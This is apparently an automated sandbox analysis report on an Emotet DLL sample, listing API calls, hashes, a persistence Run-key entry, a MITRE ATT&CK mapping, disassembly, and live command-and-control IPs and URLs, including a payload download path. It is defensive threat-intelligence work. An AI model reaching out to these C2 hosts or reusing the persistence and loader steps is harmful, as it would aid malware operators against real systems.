Source: C:\Windows\System32\regsvr32.exe	API coverage: 9.0 %

Source: C:\Windows\System32\loaddll64.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_00007FFA094FC334 FindFirstFileExW,		0_2_00007FFA094FC334
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_00007FFA094FC334 FindFirstFileExW,		3_2_00007FFA094FC334

Source: C:\Windows\System32\rundll32.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior

Source: regsvr32.exe, 00000006.00000003.430259794.0000000000F47000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.559137124.0000000000F47000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.559180821.0000000000F4A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.430161209.0000000000EFF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.559419364.0000000000EFF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.824322282.0000000000F50000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.559607371.0000000000F4D000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW

Source: C:\Windows\System32\loaddll64.exe

Code function: 0_2_00007FFA094F4944 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00007FFA094F4944

Source: C:\Windows\System32\loaddll64.exe

Code function: 0_2_00007FFA094FDD90 GetProcessHeap,

0_2_00007FFA094FDD90

Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_00007FFA094F4944 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00007FFA094F4944
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_00007FFA094F9474 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00007FFA094F9474
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_00007FFA094F3AD0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00007FFA094F3AD0
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_00007FFA094F4944 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_00007FFA094F4944
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_00007FFA094F9474 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_00007FFA094F9474
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_00007FFA094F3AD0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_00007FFA094F3AD0

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\regsvr32.exe	Network Connect: 115.178.55.22 80			Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Network Connect: 172.105.115.71 8080			Jump to behavior

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\DVvzRulsoR.dll",#1

Jump to behavior

Source: C:\Windows\System32\regsvr32.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Windows\System32\loaddll64.exe

Code function: 0_2_00007FFA094FAB50 cpuid

0_2_00007FFA094FAB50

Source: C:\Windows\System32\regsvr32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\System32\loaddll64.exe

Code function: 0_2_00007FFA094F4A94 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00007FFA094F4A94

Stealing of Sensitive Information

Yara detected Emotet

Source: Yara match	File source: 6.2.regsvr32.exe.2a20000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll64.exe.1d0bf950000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.regsvr32.exe.2190000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.regsvr32.exe.970000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.20f583f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.regsvr32.exe.2a20000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.regsvr32.exe.2190000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll64.exe.1d0bf950000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.1d380100000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.20f583f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.regsvr32.exe.970000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.1d380100000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.319410321.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.319556168.000001D380100000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.322582436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.324141127.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.824832389.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.473975639.0000000002190000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.321746653.0000020F583F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.824606786.0000000002A20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.321330759.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.324074867.000001D0BF950000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.323254712.0000000000970000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.474190042.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	11 Registry Run Keys / Startup Folder	111 Process Injection	21 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	2 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	11 Registry Run Keys / Startup Folder	1 Virtualization/Sandbox Evasion	LSASS Memory	21 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	1 Application Layer Protocol	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	1 DLL Side-Loading	111 Process Injection	Security Account Manager	1 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	1 Hidden Files and Directories	NTDS	2 Process Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Obfuscated Files or Information	LSA Secrets	1 Remote System Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	1 Regsvr32	Cached Domain Credentials	2 File and Directory Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	1 Rundll32	DCSync	24 System Information Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	1 File Deletion	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
DVvzRulsoR.dll	44%	Virustotal		Browse

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
4.2.rundll32.exe.1d380100000.0.unpack	100%	Avira	HEUR/AGEN.1215461	Download File
0.2.loaddll64.exe.1d0bf950000.0.unpack	100%	Avira	HEUR/AGEN.1215461	Download File
12.2.regsvr32.exe.2190000.0.unpack	100%	Avira	HEUR/AGEN.1215461	Download File
6.2.regsvr32.exe.2a20000.0.unpack	100%	Avira	HEUR/AGEN.1215461	Download File
5.2.rundll32.exe.20f583f0000.0.unpack	100%	Avira	HEUR/AGEN.1215461	Download File
3.2.regsvr32.exe.970000.0.unpack	100%	Avira	HEUR/AGEN.1215461	Download File

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
https://172.105.115.71:8080/dwhiakgtheb/puspmvuhrxeol/	0%	Avira URL Cloud	safe
https://172.105.115.71:8080/s.dll	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

⊘No contacted domains info

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://172.105.115.71:8080/dwhiakgtheb/puspmvuhrxeol/	regsvr32.exe, 00000006.00000003.430227487.0000000000F2D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.559120829.0000000000F34000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.430387158.0000000000F30000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.824232509.0000000000EE5000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.559685406.0000000000F35000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.824303850.0000000000F35000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://172.105.115.71:8080/s.dll	regsvr32.exe, 00000006.00000002.824281684.0000000000F1A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.430194281.0000000000F0E000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.558550380.0000000000F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.559388990.0000000000F19000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.430473686.0000000000F0E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
172.105.115.71	unknown	United States	63949	LINODE-APLinodeLLCUS	true
188.165.79.151	unknown	France	16276	OVHFR	true
196.44.98.190	unknown	Ghana	327814	EcobandGH	true
174.138.33.49	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
36.67.23.59	unknown	Indonesia	17974	TELKOMNET-AS2-APPTTelekomunikasiIndonesiaID	true
103.41.204.169	unknown	Indonesia	58397	INFINYS-AS-IDPTInfinysSystemIndonesiaID	true
85.214.67.203	unknown	Germany	6724	STRATOSTRATOAGDE	true
83.229.80.93	unknown	United Kingdom	8513	SKYVISIONGB	true
198.199.70.22	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
93.104.209.107	unknown	Germany	8767	MNET-ASGermanyDE	true
186.250.48.5	unknown	Brazil	262807	RedfoxTelecomunicacoesLtdaBR	true
209.239.112.82	unknown	United States	30083	AS-30083-GO-DADDY-COM-LLCUS	true
175.126.176.79	unknown	Korea Republic of	9523	MOKWON-AS-KRMokwonUniversityKR	true
128.199.242.164	unknown	United Kingdom	14061	DIGITALOCEAN-ASNUS	true
178.238.225.252	unknown	Germany	51167	CONTABODE	true
46.101.98.60	unknown	Netherlands	14061	DIGITALOCEAN-ASNUS	true
190.145.8.4	unknown	Colombia	14080	TelmexColombiaSACO	true
82.98.180.154	unknown	Spain	42612	DINAHOSTING-ASES	true
103.71.99.57	unknown	India	135682	AWDHPL-AS-INAdvikaWebDevelopmentsHostingPvtLtdIN	true
87.106.97.83	unknown	Germany	8560	ONEANDONE-ASBrauerstrasse48DE	true
103.254.12.236	unknown	Viet Nam	56151	DIGISTAR-VNDigiStarCompanyLimitedVN	true
103.85.95.4	unknown	Indonesia	136077	IDNIC-UNSRAT-AS-IDUniversitasIslamNegeriMataramID	true
202.134.4.210	unknown	Indonesia	7713	TELKOMNET-AS-APPTTelekomunikasiIndonesiaID	true
165.22.254.236	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
78.47.204.80	unknown	Germany	24940	HETZNER-ASDE	true
118.98.72.86	unknown	Indonesia	7713	TELKOMNET-AS-APPTTelekomunikasiIndonesiaID	true
139.59.80.108	unknown	Singapore	14061	DIGITALOCEAN-ASNUS	true
104.244.79.94	unknown	United States	53667	PONYNETUS	true
37.44.244.177	unknown	Germany	47583	AS-HOSTINGERLT	true
51.75.33.122	unknown	France	16276	OVHFR	true
160.16.143.191	unknown	Japan	9370	SAKURA-BSAKURAInternetIncJP	true
103.56.149.105	unknown	Indonesia	55688	BEON-AS-IDPTBeonIntermediaID	true
85.25.120.45	unknown	Germany	8972	GD-EMEA-DC-SXB1DE	true
139.196.72.155	unknown	China	37963	CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd	true
115.178.55.22	unknown	Indonesia	38783	SIMAYA-AS-IDPTSimayaJejaringMandiriID	true
103.126.216.86	unknown	Bangladesh	138482	SKYVIEW-AS-APSKYVIEWONLINELTDBD	true
128.199.217.206	unknown	United Kingdom	14061	DIGITALOCEAN-ASNUS	true
114.79.130.68	unknown	India	45769	DVOIS-IND-VoisBroadbandPvtLtdIN	true
103.224.241.74	unknown	India	133296	WEBWERKS-AS-INWebWerksIndiaPvtLtdIN	true
210.57.209.142	unknown	Indonesia	38142	UNAIR-AS-IDUniversitasAirlanggaID	true
202.28.34.99	unknown	Thailand	9562	MSU-TH-APMahasarakhamUniversityTH	true
80.211.107.116	unknown	Italy	31034	ARUBA-ASNIT	true
54.37.228.122	unknown	France	16276	OVHFR	true
218.38.121.17	unknown	Korea Republic of	9318	SKB-ASSKBroadbandCoLtdKR	true
185.148.169.10	unknown	Germany	44780	EVERSCALE-ASDE	true
195.77.239.39	unknown	Spain	60493	FICOSA-ASES	true
178.62.112.199	unknown	European Union	14061	DIGITALOCEAN-ASNUS	true
62.171.178.147	unknown	United Kingdom	51167	CONTABODE	true
64.227.55.231	unknown	United States	14061	DIGITALOCEAN-ASNUS	true

General Information

Joe Sandbox Version:	36.0.0 Rainbow Opal
Analysis ID:	745057
Start date and time:	2022-11-13 18:33:46 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 10m 27s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	DVvzRulsoR.exe (renamed file extension from exe to dll)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	15
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal84.troj.evad.winDLL@21/2@0/49
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 61.5% (good quality ratio 55.9%) Quality average: 60.9% Quality standard deviation: 31.8%
HCA Information:	Successful, ratio: 100% Number of executed functions: 50 Number of non-executed functions: 142
Cookbook Comments:	Override analysis time to 240s for rundll32

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 8.248.113.254, 8.238.191.126, 67.26.73.254, 8.248.119.254, 8.248.115.254
Excluded domains from analysis (whitelisted): client.wns.windows.com, fg.download.windowsupdate.com.c.footprint.net, ctldl.windowsupdate.com, wu-bg-shim.trafficmanager.net
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
18:35:33	API Interceptor	2x Sleep call for process: regsvr32.exe modified
18:35:48	Autostart	Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run OFkfcZsheb.dll C:\Windows\system32\regsvr32.exe "C:\Windows\system32\XbzeDYiEMjhuDu\OFkfcZsheb.dll"

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
172.105.115.71	BiiRGnhWx8.dll	Get hash	malicious	Browse
	jYzNEOocXJ.dll	Get hash	malicious	Browse
	BiiRGnhWx8.dll	Get hash	malicious	Browse
	gdazhx1EIP.dll	Get hash	malicious	Browse
	UNUy8dUYWp.dll	Get hash	malicious	Browse
	gdazhx1EIP.dll	Get hash	malicious	Browse
	UNUy8dUYWp.dll	Get hash	malicious	Browse
	3sbn8ZI5nn.dll	Get hash	malicious	Browse
	3sbn8ZI5nn.dll	Get hash	malicious	Browse
	zzkCIdCoDt.dll	Get hash	malicious	Browse
	zzkCIdCoDt.dll	Get hash	malicious	Browse
	U9M1w8FHBW.dll	Get hash	malicious	Browse
	En3ZIyuYdw.dll	Get hash	malicious	Browse
	Kjx74pqege.dll	Get hash	malicious	Browse
	U9M1w8FHBW.dll	Get hash	malicious	Browse
	En3ZIyuYdw.dll	Get hash	malicious	Browse
	Kjx74pqege.dll	Get hash	malicious	Browse
	mqMIxHWdwe.dll	Get hash	malicious	Browse
	i590SBAZAI.dll	Get hash	malicious	Browse
	rbh8gbxi93.dll	Get hash	malicious	Browse
188.165.79.151	BiiRGnhWx8.dll	Get hash	malicious	Browse
	jYzNEOocXJ.dll	Get hash	malicious	Browse
	BiiRGnhWx8.dll	Get hash	malicious	Browse
	gdazhx1EIP.dll	Get hash	malicious	Browse
	UNUy8dUYWp.dll	Get hash	malicious	Browse
	gdazhx1EIP.dll	Get hash	malicious	Browse
	UNUy8dUYWp.dll	Get hash	malicious	Browse
	3sbn8ZI5nn.dll	Get hash	malicious	Browse
	3sbn8ZI5nn.dll	Get hash	malicious	Browse
	zzkCIdCoDt.dll	Get hash	malicious	Browse
	zzkCIdCoDt.dll	Get hash	malicious	Browse
	U9M1w8FHBW.dll	Get hash	malicious	Browse
	En3ZIyuYdw.dll	Get hash	malicious	Browse
	Kjx74pqege.dll	Get hash	malicious	Browse
	U9M1w8FHBW.dll	Get hash	malicious	Browse
	Kjx74pqege.dll	Get hash	malicious	Browse
	mqMIxHWdwe.dll	Get hash	malicious	Browse
	i590SBAZAI.dll	Get hash	malicious	Browse
	rbh8gbxi93.dll	Get hash	malicious	Browse
	aukDPlAxnc.dll	Get hash	malicious	Browse

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
LINODE-APLinodeLLCUS	BiiRGnhWx8.dll	Get hash	malicious	Browse	172.105.115.71
	jYzNEOocXJ.dll	Get hash	malicious	Browse	172.105.115.71
	BiiRGnhWx8.dll	Get hash	malicious	Browse	172.105.115.71
	gdazhx1EIP.dll	Get hash	malicious	Browse	172.105.115.71
	UNUy8dUYWp.dll	Get hash	malicious	Browse	172.105.115.71
	gdazhx1EIP.dll	Get hash	malicious	Browse	172.105.115.71
	UNUy8dUYWp.dll	Get hash	malicious	Browse	172.105.115.71
	3sbn8ZI5nn.dll	Get hash	malicious	Browse	172.105.115.71
	3sbn8ZI5nn.dll	Get hash	malicious	Browse	172.105.115.71
	zzkCIdCoDt.dll	Get hash	malicious	Browse	172.105.115.71
	zzkCIdCoDt.dll	Get hash	malicious	Browse	172.105.115.71
	U9M1w8FHBW.dll	Get hash	malicious	Browse	172.105.115.71
	En3ZIyuYdw.dll	Get hash	malicious	Browse	172.105.115.71
	Kjx74pqege.dll	Get hash	malicious	Browse	172.105.115.71
	U9M1w8FHBW.dll	Get hash	malicious	Browse	172.105.115.71
	En3ZIyuYdw.dll	Get hash	malicious	Browse	172.105.115.71
	Kjx74pqege.dll	Get hash	malicious	Browse	172.105.115.71
	mqMIxHWdwe.dll	Get hash	malicious	Browse	172.105.115.71
	ozZDLYwvhE.dll	Get hash	malicious	Browse	172.105.226.75
	i590SBAZAI.dll	Get hash	malicious	Browse	172.105.115.71

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Windows\System32\regsvr32.exe
File Type:	Microsoft Cabinet archive data, Windows 2000/XP setup, 62919 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
Category:	dropped
Size (bytes):	62919
Entropy (8bit):	7.995280921994772
Encrypted:	true
SSDEEP:	1536:d+OfVxHl7Wyf11lYom3xQcRVOtPHwQV4rP6Ji7:d+OxHxJlZcuPt4b6q
MD5:	3DCF580A93972319E82CAFBC047D34D5
SHA1:	8528D2A1363E5DE77DC3B1142850E51EAD0F4B6B
SHA-256:	40810E31F1B69075C727E6D557F9614D5880112895FF6F4DF1767E87AE5640D1
SHA-512:	98384BE7218340F95DAE88D1CB865F23A0B4E12855BEB6E74A3752274C9B4C601E493864DB777BCA677A370D0A9DBFFD68D94898A82014537F3A801CCE839C42
Malicious:	false
Preview:	MSCF............,...................I.......Q.........GU.\ .authroot.stl..O..5..CK..<Tk...c_.d....A.K...+.d.-;%.BJII!.QIR..$t)Kd.-QQ...g......^..~\|N=...y....{. .4{...W....b.i...j.I.......1:..b\.0.....Ait.2t......w.%.&.",tL_...4.8L[G..;.57....AT.k.......V..K......(....mzS...G....r.".=H.?>.........x&...S%....X.M^..j...A..x.9`.9...A../.s..#.4#.....Id.w..B....s.8..(...dj....=L.)..s.d.]NxQX8....stV#.K.'7.tH..9u~.2..!..2./.....!..9C../...mP $..../y.....@p.6.}.`...5. 0r.w...@(.. .Q....)g.........m..z.8rR..).].T9r<.L....0..`.........c.....;-.g..;.wk.)......i..c5.....{v.u...AS..=.....&.:.........+..P.N..9..EAQ.V.$s.......B.`.Mfe..8.......$...y-.q9J........W...2.Q8...O.......i..@\^.=X..dG$.M..#=....m.h..{9.'...-.v..Z...!....z.....N....i..^..,........d...%Xa~q.@D\|0...Y.m...........&d.4..A..{t=...../.t.3._.....?-.....uroP?.d.Z..S..{...$.i....X..$.O..4..N.)....U.Z..P....X,.... ...Lg..35..W..s.!c...Ap.].P..8..M..W.......U..,...m.u..\|=.m1..~..!..b...._.

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Windows\System32\regsvr32.exe
File Type:	data
Category:	modified
Size (bytes):	328
Entropy (8bit):	3.09653883373511
Encrypted:	false
SSDEEP:	6:kKVsNlhN1HlNiN+SkQlPlEGYRMY9z+4KlDA3RUeKlTAlWRyf1:2b/kPlE99SNxAhUexYo1
MD5:	A81642D8810B844A102B561FDE5D7063
SHA1:	68BE6DAC994F4F4B52D56C113F64AD835E5F332C
SHA-256:	ED749DFE84F8BDE218D06AF5427672779187ABA4A0964AF4EC3F149AC9588C39
SHA-512:	4A856C7F980B2887B53CCB3DC7FBC4E86FFC01EC4E62560F8643E16E66B6AADF7AF8217B91C671E8A702489D1D1EC8E0CAF9A169499F222FB4DC07BB454F4869
Malicious:	false
Preview:	p...... ........../.....(....................................................... ..................&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.e.d.e.4.d.3.9.b.e.8.d.8.1.:.0."...

Static File Info

General

File type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Entropy (8bit):	6.619182779595571
TrID:	Win64 Dynamic Link Library (generic) (102004/3) 86.43% Win64 Executable (generic) (12005/4) 10.17% Generic Win/DOS Executable (2004/3) 1.70% DOS Executable Generic (2002/1) 1.70% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.01%
File name:	DVvzRulsoR.dll
File size:	528896
MD5:	c9d4c1c3f8729727c29e257f612e019f
SHA1:	15dd4aedf9f79cabbc8c0b057f6a0f9437c9ede7
SHA256:	030eb0fa76d1329d836619c55778968fc664186642fbb16df30ec1be10396fc9
SHA512:	97e3634807165add820a1c912c1700844db9f049e80b3ca7c1bfccd3724742c910050e95cd4da67e98679287d4a143db6d1688ef9faf220f1f13c29cdfcfc746
SSDEEP:	6144:mW1239bnTe+0Qv7NSEBj43USaI6Y/jOpxHRikSYI+QALgIJ1divndEXcn:mW1e9PeexPBjvKSpuvYI+TLgs1dcEXc
TLSH:	E0B4F829A59E76F0C951A1F5A0420B1595F33C88FEF68EAF03502F296F6F24425F768C
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................$...s...$...............................$.......$...............`.......`.......e.h.....`.......Rich...........

File Icon


Icon Hash:	74f0e4ecccdce0e4

Static PE Info

General

Entrypoint:	0x1800044e0
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x180000000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, DLL
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x636D6724 [Thu Nov 10 21:03:32 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	81146e0614ccc4eb7174ad2ad695dedb

Entrypoint Preview

Instruction
dec eax
mov dword ptr [esp+08h], ebx
dec eax
mov dword ptr [esp+10h], esi
push edi
dec eax
sub esp, 20h
dec ecx
mov edi, eax
mov ebx, edx
dec eax
mov esi, ecx
cmp edx, 01h
jne 00007FD168C71567h
call 00007FD168C71AF8h
dec esp
mov eax, edi
mov edx, ebx
dec eax
mov ecx, esi
dec eax
mov ebx, dword ptr [esp+30h]
dec eax
mov esi, dword ptr [esp+38h]
dec eax
add esp, 20h
pop edi
jmp 00007FD168C713DCh
int3
int3
int3
inc eax
push ebx
dec eax
sub esp, 20h
dec eax
mov ebx, ecx
dec eax
mov eax, edx
dec eax
lea ecx, dword ptr [00033F0Dh]
dec eax
mov dword ptr [ebx], ecx
dec eax
lea edx, dword ptr [ebx+08h]
xor ecx, ecx
dec eax
mov dword ptr [edx], ecx
dec eax
mov dword ptr [edx+08h], ecx
dec eax
lea ecx, dword ptr [eax+08h]
call 00007FD168C73D61h
dec eax
lea eax, dword ptr [00033F1Dh]
dec eax
mov dword ptr [ebx], eax
dec eax
mov eax, ebx
dec eax
add esp, 20h
pop ebx
ret
int3
xor eax, eax
dec eax
mov dword ptr [ecx+10h], eax
dec eax
lea eax, dword ptr [00033F13h]
dec eax
mov dword ptr [ecx+08h], eax
dec eax
lea eax, dword ptr [00033EF8h]
dec eax
mov dword ptr [ecx], eax
dec eax
mov eax, ecx
ret
int3
inc eax
push ebx
dec eax
sub esp, 20h
dec eax
mov ebx, ecx
dec eax
mov eax, edx
dec eax
lea ecx, dword ptr [00033EADh]
dec eax
